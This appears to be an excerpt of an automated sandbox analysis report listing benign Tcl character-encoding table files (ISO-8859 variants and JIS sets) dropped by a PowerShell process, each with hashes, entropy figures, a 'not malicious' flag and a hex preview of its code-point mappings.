                                                                                                                                                                                                                      SHA-256:3271D39D7B4DCD841E8E5D5153D1B8837718B88FEFEC73DC37D314816EEFE5E5
                                                                                                                                                                                                                      SHA-512:3A0E033A4D93C679215F672C6C4FE425D63E1DE157AA671E7400639165EC3EB498E4EEB030D6FB8FF8BE2FD8C986D341036A8CED9FA094D092CF2822D5DC065B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-13, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0201D00A200A300A4201E00A600A700D800A9015600AB00AC00AD00AE00C6..00B000B100B200B3201C00B500B600B700F800B9015700BB00BC00BD00BE00E6..0104012E0100010600C400C501180112010C00C90179011601220136012A013B..01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF..0105012F010101070
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1115
                                                                                                                                                                                                                      Entropy (8bit):3.3670559016263915
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:vHVBUlJvRj7SOVbusZhAMiZyi77qimhw6COlk1fKMH+tiH:vMlBVnrAMiwMmT/tlkQz0
                                                                                                                                                                                                                      MD5:FDAA88946DE4EB4E6D37F2B6AFCF6CAF
                                                                                                                                                                                                                      SHA1:56FC4773941E7457EA04EDA92C883642DE45D100
                                                                                                                                                                                                                      SHA-256:F0A5675027FB1CA34B4E4128D24C2968CD275890569A32A86AFA4994CE4983E0
                                                                                                                                                                                                                      SHA-512:92658A6FEB42A41B3CFFC377C4A9A3F6780A79FC596D3FEDBA6D3B3D75A9F40E859A2CE8DC579A278BAEEDEEFA2408E2B7853D99D5C2D14AACF63C521FE2BB86
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-14, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A01E021E0300A3010A010B1E0A00A71E8000A91E821E0B1EF200AD00AE0178..1E1E1E1F012001211E401E4100B61E561E811E571E831E601EF31E841E851E61..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..017400D100D200D300D400D500D61E6A00D800D900DA00DB00DC00DD017600DF..00E000E100E200E30
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1115
                                                                                                                                                                                                                      Entropy (8bit):3.260398494526282
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:mHVBUlJvRj7SOVbusZhAMiZyi77qimmRf4kL+rSMH+tKv:mMlBVnrAMiwMmTmCkLz0
                                                                                                                                                                                                                      MD5:D779D5E2A0083C616A226B2D82ABF0EB
                                                                                                                                                                                                                      SHA1:D1657DB5E2989EBA80BAB98A1E1217CFFFBB19DB
                                                                                                                                                                                                                      SHA-256:C74E8E23A0FF0D5DEA7C318CA20DC817DA4E57B0DD61B3361FC0D5098A9316FE
                                                                                                                                                                                                                      SHA-512:26E62BE8AE793ED3B725BF0D1BABF4D6ED63A6F3772ABD48955FC4394BDE5A47614D1FF89A21A828676BF1302F3C9361B557B0FBF0DF8561FB7E66542FE94CDC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-15, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A320AC00A5016000A7016100A900AA00AB00AC00AD00AE00AF..00B000B100B200B3017D00B500B600B7017E00B900BA00BB01520153017800BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E30
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1115
                                                                                                                                                                                                                      Entropy (8bit):3.3065938185320918
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:dHVBUlJvRj7SOVbusZhAMiZyi77qim0SmmPkYTtyL:dMlBVnrAMiwMmTttPkYpyL
                                                                                                                                                                                                                      MD5:74FDEDDAF670023DA7751FB321E345A0
                                                                                                                                                                                                                      SHA1:0677FED67C1333A9A74D50642E5214701A57E2AF
                                                                                                                                                                                                                      SHA-256:640D977EC1D22B555C5075798DA009E3523E8F55F29BE22A3050CD1B4EF7B80E
                                                                                                                                                                                                                      SHA-512:AC02FD95159A856A9DDEF4E6A8216B958DC07311B553FF39403DC5B77E1AFF2A2C4C03F5F26A2BB7AD5DB6800BEE03E895554556DBBFBE89426286796ADE55AC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-16, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A001040105014120AC201E016000A7016100A9021800AB017900AD017A017B..00B000B1010C0142017D201D00B600B7017E010D021900BB015201530178017C..00C000C100C2010200C4010600C600C700C800C900CA00CB00CC00CD00CE00CF..0110014300D200D300D4015000D6015A017000D900DA00DB00DC0118021A00DF..00E000E100E201030
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1114
                                                                                                                                                                                                                      Entropy (8bit):3.340505173539446
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:UHVBUlJvRj7SOVbusZhAMiZyi77qim/ssm5VO6ys2K:UMlBVnrAMiwMmT/ssYTys2K
                                                                                                                                                                                                                      MD5:9B87850646FFE79F3C8001CBCB5BB3A1
                                                                                                                                                                                                                      SHA1:8F97576F3FB3B5DBEF71DC2C9314AB5E530974D6
                                                                                                                                                                                                                      SHA-256:76949B03F57041B07F41902BD7505AB3594D79AA8F7BDEED5F0481004B10CBC3
                                                                                                                                                                                                                      SHA-512:101A28AF0799E7E0A5723E5DD76D5EF0FEEF584AC479A88F499CB3B7D2AA93767D72F8E51C76F7547F08FF8DD3CBBA7FF444BD07F99A92755526E75C596109EF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-2, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0010402D8014100A4013D015A00A700A80160015E0164017900AD017D017B..00B0010502DB014200B4013E015B02C700B80161015F0165017A02DD017E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1114
                                                                                                                                                                                                                      Entropy (8bit):3.2507537230559977
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tHVBUlJvRj7SOVbusZhAMiZyi77qimw2g0kgTJMkFtoD:tMlBVnrAMiwMmTo0kgTJDoD
                                                                                                                                                                                                                      MD5:CBD0B9CDCD9BC3D5F2429A760CF98D2F
                                                                                                                                                                                                                      SHA1:6DEF0343E0357E0671002A5D2F0BFC2E00C8BCF9
                                                                                                                                                                                                                      SHA-256:1F51E7BDA64D466C16FEE9A120BBE3353A10CEB9DAB119FFA326779BA78D8C5D
                                                                                                                                                                                                                      SHA-512:88DB6D23B53F4A78133C794ED42FA3F29A4ABAD35DE4B022040FA187AA59B00664CC13F47AFF4507D72F4CB2166F026144213EE760AB0FD67CDD2FA5906F434A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-3, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0012602D800A300A40000012400A700A80130015E011E013400AD0000017B..00B0012700B200B300B400B5012500B700B80131015F011F013500BD0000017C..00C000C100C2000000C4010A010800C700C800C900CA00CB00CC00CD00CE00CF..000000D100D200D300D4012000D600D7011C00D900DA00DB00DC016C015C00DF..00E000E100E2000000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1114
                                                                                                                                                                                                                      Entropy (8bit):3.3413832766873073
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:KHVBUlJvRj7SOVbusZhAMiZyi77qimX4AsD/njR7Ky8hA:KMlBVnrAMiwMmTXBs3EyuA
                                                                                                                                                                                                                      MD5:8B620EDECAC2DF15A024C2CE15FB64A5
                                                                                                                                                                                                                      SHA1:65C5EE5D08964E37393E6A78ABA0DB16D51240E2
                                                                                                                                                                                                                      SHA-256:66B3CF994F0B5E0103D13E812958320AFB555C91E3F81B579D4CBF231E6A0805
                                                                                                                                                                                                                      SHA-512:93391325405D3AEA0A913F5EA8EA0391920D10F234C26AB1DA70992702889A3AF7B85E11A1FCA554690942B238CE313DD460798E59C5B1F4069036E7B0F24F44
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-4, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A001040138015600A40128013B00A700A8016001120122016600AD017D00AF..00B0010502DB015700B40129013C02C700B80161011301230167014A017E014B..010000C100C200C300C400C500C6012E010C00C9011800CB011600CD00CE012A..01100145014C013600D400D500D600D700D8017200DA00DB00DC0168016A00DF..010100E100E200E300
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1114
                                                                                                                                                                                                                      Entropy (8bit):3.342721205983665
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:zHVBUlJvRj7SOVbusZhAMiZyi77qimq5+SAJlz9aRme3cJbx:zMlBVnrAMiwMmTqeYnsJbx
                                                                                                                                                                                                                      MD5:6FBEFDC3DEC612B7B2CC903D8C53F45B
                                                                                                                                                                                                                      SHA1:14EC3C166DC411149C32C262DBE8E327F6186669
                                                                                                                                                                                                                      SHA-256:3130BF26DA0C840C1E02203A90C3B1C38966FB203130E2FBB3DD7CB3865A3539
                                                                                                                                                                                                                      SHA-512:F3F15AD8B6C9D9B4C9C994FE3235B4463E59BE7DCE79CF3F7AA77905D6F4DC2C4AABB79B440767DB13D357B13F09EA34983FCA7BC92D0AFA15FB6CBEDDD04E38
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-5, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0040104020403040404050406040704080409040A040B040C00AD040E040F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..0430043104320433043404350436043704380439043A043B043C043D043E043F..044004410442044304
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1114
                                                                                                                                                                                                                      Entropy (8bit):2.992219341429816
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:YHVBUlJvRj7SOVbusZhAMiZyi77qimEZjyG/KE:YMlBVnrAMiwMmTEs6KE
                                                                                                                                                                                                                      MD5:52F025D943A45EE840D9C3DFD06E4D79
                                                                                                                                                                                                                      SHA1:571EA14B49FA6150BFD2ABA79E52799955D9FA10
                                                                                                                                                                                                                      SHA-256:CB71909BF01A3A7A4C7396359DA06D206B58A42AD68192CE37169D6640D46E13
                                                                                                                                                                                                                      SHA-512:77FF9DC785A63CA59A7D58BB25C7D2C16F364E525F9B939177385EF80F7DE37734C8774F1BC829CF0270FD66257A4D31689654C8037DB0A86A0291FFDE637B90
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-6, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000000000000000A40000000000000000000000000000060C00AD00000000..00000000000000000000000000000000000000000000061B000000000000061F..0000062106220623062406250626062706280629062A062B062C062D062E062F..0630063106320633063406350636063706380639063A00000000000000000000..064006410642064306
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1114
                                                                                                                                                                                                                      Entropy (8bit):3.393893260854861
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:TMyHVBUlJvRj7SOVbusZhAMiZyi77qim2OBHK9QQSqiWeIDDdn:TlMlBVnrAMiwMmT1hKyQSqiWeIVn
                                                                                                                                                                                                                      MD5:4BFB0A35D971A9D4C5EA8D8099E93C37
                                                                                                                                                                                                                      SHA1:8FED2CBB1343E5B4442748242B5F89A76110592D
                                                                                                                                                                                                                      SHA-256:76F6BC85FC9CB89BC3F94D36275AB23C740BA17FD36EC8907479DA3A885415EA
                                                                                                                                                                                                                      SHA-512:C9CE1E9EA57A1DEF62BBC60A115C06325C6EE8F92021695459E1ADAF1193A559BC5F0229191BFC2E344296DC137583ED4A9A61A65890F99F4CF97B3864C7AF0F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-7, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A02018201900A320AC20AF00A600A700A800A9037A00AB00AC00AD00002015..00B000B100B200B303840385038600B703880389038A00BB038C00BD038E038F..0390039103920393039403950396039703980399039A039B039C039D039E039F..03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF..03B003B103B203B303
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1114
                                                                                                                                                                                                                      Entropy (8bit):3.0494739426493567
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:uHVBUlJvRj7SOVbusZhAMiZyi77qimieGlnvs26Kcv:uMlBVnrAMiwMmTirv87
                                                                                                                                                                                                                      MD5:5F69EAF54E7A1E8AC81C9E734DBE90D8
                                                                                                                                                                                                                      SHA1:BA509C88A4FC03922EF5CDC887FAA7B594A9BC5A
                                                                                                                                                                                                                      SHA-256:865E3665743B5FABA3E1AD6AA55515A666BD05DA6266879D9B66C98905DAFF3C
                                                                                                                                                                                                                      SHA-512:D9924FBE59CB571AF721CA602DBE58CAD0D9310610EDF544F8FC0FBF3D1CE4E99597D0198E4E7C802107012786346FE4C1B9C6C3A76D5F60B9A83981B0EDA24D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-8, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0000000A200A300A400A500A600A700A800A900D700AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000002017..05D005D105D205D305
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1114
                                                                                                                                                                                                                      Entropy (8bit):3.2591070910715714
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:XHVBUlJvRj7SOVbusZhAMiZyi77qimmvGNNlkBSMH+tA/b:XMlBVnrAMiwMmTmokgzAD
                                                                                                                                                                                                                      MD5:0B99E605E73B7D8DEFD8D643F5729748
                                                                                                                                                                                                                      SHA1:F30E7CCBCD9C539126E8D6CA0886E4B2BD54E05D
                                                                                                                                                                                                                      SHA-256:CF51E867DDE2F19553D98FEEC45A075C4B4F480FB1EDADB3D8DAD1EBEA9299F3
                                                                                                                                                                                                                      SHA-512:DA0487CD7F2143195E80697C17FFDB61AFD464C888DDF84813B2B5D1BAB24D96466DA7A7F77C8E4A9D0D53F34D72928923380AFC1B92A96C0A3BFF46006A4E19
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: iso8859-9, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF..00E000E100E200E300
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1112
                                                                                                                                                                                                                      Entropy (8bit):3.2708615484795676
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:zBHVBUlJvRj7SOVbusZhAMiZyi77qN8VmKfkiJt0RMFS:zBMlBVnrAMiwMmNPYPFS
                                                                                                                                                                                                                      MD5:4E21F24F8D9CC5DF16B29CACD997AC69
                                                                                                                                                                                                                      SHA1:064E723EFB82EF1C303E5267496304288821E404
                                                                                                                                                                                                                      SHA-256:61B14A7C312366F79BB45F02C6B7EE362E6F51CBAD5E479E563C7F7E785DB654
                                                                                                                                                                                                                      SHA-512:AF8FAEB47EFB51F2537139F7C4254ABED119E477FD2B5E83B90B7A903B43C4E02DDF43A7DDB044A0A9601E9F9ADE91B02EE7C0EC87FF5DDCF9951B9601A90435
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: jis0201, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D203E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..00000000000000000000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):81772
                                                                                                                                                                                                                      Entropy (8bit):2.3571626869060776
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:AigXM6CwL/9pV7Hl6+Yko9gZxErA3/MS/8xqg8:AZ/tp1Hl2KZxUfr8
                                                                                                                                                                                                                      MD5:F0661E22C7455994AA1F6EC1EDA401B4
                                                                                                                                                                                                                      SHA1:928B2AC46A9FDE61A81F56BE225E6138B40C22E5
                                                                                                                                                                                                                      SHA-256:F6B1C6AC5F5FC4E990A7A1AAC16A406012040936431BEFE7D2B6CD1DA9E422C4
                                                                                                                                                                                                                      SHA-512:917CC58678A9E9F5CBE860D30828846ABA4EA8CDFAB7DD1AE6A66C47ECBB85CF67DD97BC3E6F95341DD30F4E757B2CEA571708D5B4CED18A29F19904C3138AE0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: jis0208, double-byte..D..2129 0 77..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000300030013002FF0CFF0E30FBFF1AFF1BFF1FFF01309B309C00B4FF4000A8..FF3EFFE3FF3F30FD30FE309D309E30034EDD30053006300730FC20152010FF0F..FF3C301C2016FF5C2026202520182019201C201DFF08FF0930143015FF3BFF3D..FF5BFF5D30083009300A300B300C300D300E300F30103011FF0B221200B100D7..00F7FF1D2260FF1CFF1E22662267221E22342642264000B0203220332103FFE5..FF0400A200A3FF05FF03FF06FF0AFF2000A72606260525CB25CF25CE25C70000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):72133
                                                                                                                                                                                                                      Entropy (8bit):2.3455261548208055
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:9F/D7CH2puD5CdzU3nAkP5dHn7s391fmOarFaVQ:H/D7CHbozU3nAk3H7sXm3FgQ
                                                                                                                                                                                                                      MD5:07CE2C135BE17DBAFA558AA5949A53DB
                                                                                                                                                                                                                      SHA1:5D9DBEFCCB44E76C1A4E61360C6FCED8DCC8EF4D
                                                                                                                                                                                                                      SHA-256:785CFC5F5D9CB06DB8061730AB0016A0F70D0B59F6787D2A3CBB8D5779C99706
                                                                                                                                                                                                                      SHA-512:E954D7198D58ACEDEB4C8E5F466107767C3DA43763A5F6CDDFCF567226F9B22B4C2DE27564F28CD125D7F1BA7CB9C6DE6DEC4065EC2676572C793BE458FDDD9D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: jis0212, double-byte..D..2244 0 68..22..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000000000000000000000000000000000000000002D8..02C700B802D902DD00AF02DB02DA007E03840385000000000000000000000000..0000000000A100A600BF00000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000BA00AA00A900AE2122..00A4211600000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
